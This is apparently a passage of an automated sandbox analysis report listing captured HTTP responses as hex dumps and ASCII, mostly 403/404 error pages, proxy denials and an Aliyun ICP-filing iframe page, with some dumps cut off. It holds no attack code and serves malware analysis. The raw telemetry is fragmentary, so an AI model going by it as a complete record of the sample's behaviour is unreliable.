32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 4d
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 11 Mar 2024 15:16:42 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: closeContent-Type: text/htmlCache-Control: no-cacheX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffContent-Length: 4872Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 38 3b 20 49 45 3d 45 44 47 45 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 61 36 61 36 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 64 61 74 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 70 61 73 73 77 6f 72 64 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 78 74 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 69 6d 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 75 72 6c 5d 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 36 32 36 32 36 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 2
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 11 Mar 2024 15:16:43 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 11 Mar 2024 15:16:43 GMTServer: ApacheContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 11 Mar 2024 15:16:44 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 15:16:44 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 11 Mar 2024 15:16:45 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 15:16:45 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 15:16:45 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Mon, 11 Mar 2024 15:16:45 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 